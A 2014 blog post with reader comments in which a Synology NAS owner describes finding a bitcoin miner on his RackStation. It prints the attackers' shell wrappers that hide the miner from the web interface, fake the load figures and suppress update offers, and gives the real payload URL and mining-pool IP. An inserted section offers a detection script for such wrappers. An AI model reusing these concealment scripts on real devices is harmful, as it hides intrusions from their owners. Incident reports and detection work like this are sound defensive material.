My Synology RackStation got Hacked!
Written by Grant on February 10, 2014 – 11:15 pm

I post this here in case others are searching for this issue as I couldn’t find much about it – there is however a mention of it at the Synology forum: http://forum.synology.com/enu/viewtopic.php?f=19&t=80857

There is also a discussion on Facebook : https://www.facebook.com/synology/posts/10152007533142897


Today I found that my 22-bay Synology RackStation has been hacked and that the resource monitor on the main web interface was tampered with – I guess to hide the massive resource usage from the hackers who ran BitCoin mining software.

I got suspicious when my RackStation started to seem really slow when running Download Station – I logged in via ssh and ran TOP and saw 3 processes using 25% CPU – they were called PWNEDm and connected to an IP address of 46.244.18.176 on tcp port 9555.

After some investigation I found the rogue folder (/PWNED) – it seems to download a payload from here: http://65.36.55.70:5000/jynx2.so

I was able to kill the three tasks and delete the folder – nothing else could be found so I think it’s gone; although it has modified some files and I am not sure of the exact full extent yet.

The tasks were called PWNEDm – upon looking at this with a hex editor it is clearly just “mined” renamed – a Linux BitCoin miner.

What is scary is that they seem to know that they were running on a DiskStation, as some of the files/scripts appear to reference Synology file paths so they can overwrite files and hide their presence.

I am reluctant to reboot as maybe some Synology files are damaged — I can already see a few scripts such as:

top.cgi:
#!/bin/sh
# runs the renamed original (top2.cgi) and drops every block of process-list output that mentions PWNED or top2.cgi
/usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}' '{print}' ORS=""

upgrade.cgi:
#!/bin/sh
# runs the renamed original (upgrade2.cgi) and forces "available_for_download" to false so DSM never offers an update
/usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi | sed -e 's/\("available_for_download" *: *\).*,/\1 false,/'

rsrcmonitor3.cg1:
#!/bin/sh
# six random single digits used to replace the real load figures
rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))

# runs the real resource monitor CGI and rewrites every load value in its JSON with the random digits above
/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi | sed \
  -e "s/\(\"15minLoad\" *: *\)[0-9]*\(,*\)/\1$rand1\2/" \
  -e "s/\(\"1minLoad\" *: *\)[0-9]*\(,*\)/\1$rand2\2/" \
  -e "s/\(\"5minLoad\" *: *\)[0-9]*\(,*\)/\1$rand3\2/" \
  -e "s/\(\"OtherLoad\" *: *\)[0-9]*\(,*\)/\1$rand4\2/" \
  -e "s/\(\"SystemLoad\" *: *\)[0-9]*\(,*\)/\1$rand5\2/" \
  -e "s/\(\"UserLoad\" *: *\)[0-9]*\(,*\)/\1$rand6\2/"

These appear to overwrite some Synology files and perform other mischief.
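As an added check (not from the post or from Synology), the wrapper trick above has a simple signature: a DSM .cgi that is a shell script piping a renamed sibling CGI through awk or sed, whereas a genuine DSM CGI is a compiled binary. The script below looks for that pattern; make_fixture builds a constructed sample directory so it runs anywhere, and the /usr/syno paths in the usage comment are assumed from the post.

```shell
#!/bin/sh
# Added example (not part of the original post): detect the wrapper trick seen above,
# where a DSM .cgi is replaced by a tiny shell script that runs the renamed original
# (e.g. top2.cgi) and filters its output through awk or sed.

# Print every .cgi/.cg1 in DIR that is a shell script piping a sibling CGI through
# awk or sed, or that mentions the PWNED directory.
scan_cgi_dir() {
  dir="$1"
  for f in "$dir"/*.cgi "$dir"/*.cg1; do
    [ -f "$f" ] || continue
    # only a file that starts with a shebang can be a script wrapper
    case "$(head -c 2 "$f" 2>/dev/null)" in '#!') ;; *) continue ;; esac
    if grep -Eq '\.cgi[[:space:]]*[|][[:space:]]*(awk|sed)|PWNED' "$f"; then
      echo "$f"
    fi
  done
}

# Constructed fixture (no real DSM files): one tampered wrapper, one stand-in for a
# genuine compiled CGI (ELF magic, no shebang), one harmless script that pipes nothing.
make_fixture() {
  d=$(mktemp -d)
  cat > "$d/top.cgi" <<'EOF'
#!/bin/sh
/usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}' '{print}' ORS=""
EOF
  printf '\177ELF\002\001\001' > "$d/top2.cgi"
  printf '#!/bin/sh\nexec /bin/true\n' > "$d/helper.cgi"
  echo "$d"
}

# Usage on a real box (module paths assumed from the post):
#   for m in ResourceMonitor ControlPanel/modules; do
#     scan_cgi_dir "/usr/syno/synoman/webman/modules/$m"
#   done
```

Any path it prints is a wrapper to compare against the same file from a clean DSM package of the same version and architecture.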

Before I reboot, what I would like to know is: if I look at all the scripts and note down all the files they modify, could I copy “clean” files from my DS214+ to my RackStation 2212+?

I do have a pretty tight password set too — containing numbers, letters and some punctuation chars — very weird! I only allow outside access to the Download Station plugin, and only to a few friends who have their own account and strong passwords – in the meantime I’ve blocked it at my firewall and added firewall blocks on the two IP addresses mentioned above, just in case!

I will follow this up on the Synology forum – for those that wanted the PWNED folder to analyse it, you can find it here: Syno-PWNED


Update: There seem to be two versions.

The one I found (user ‘smmsp’ with multiple PWNEDm processes running – actually a program called mined that’s been renamed), no other apparent damage besides tampering with some Synology web-interface files to hide its CPU activity. It seems to all be started from a user called smmsp (the Sendmail user – listed in the /etc/passwd file).

There also seems to be another variant that actively looks for usernames/passwords in places such as /etc/ddns.conf and adds a folder called /volume1/startup with a Perl script to activate itself. This one also seems to tamper with some rudimentary command line tools such as ls, cat and top to prevent removal.


4 Responses

  1. You can’t copy from DS214+ to an RS 2212+. ARM vs. Intel CPU.

  2. I found out the hard way!

    I was able to download the old version of DSM for my box from http://ukdl.synology.com/download/DSM/ and then unzip it using 7Zip until I got to the correct files.

    It still hasn’t fixed the interface errors but I am hoping a reboot sorts these out.

  3. I just discovered my DiskStation was hacked. Thanks for the write up. I’m just beginning investigation and will post here if I find out anything more. I’m most curious what vuln they exploited. Looking in the logs doesn’t show anything obvious.

  4. Hi Grant, we have released an updated DSM version to fix the security issues. Please find more information at http://www.synology.com/en-global/company/news/article/437. If your DiskStation still behaves suspiciously after being upgraded to the latest DSM version, please contact security@synology.com. Thank you.
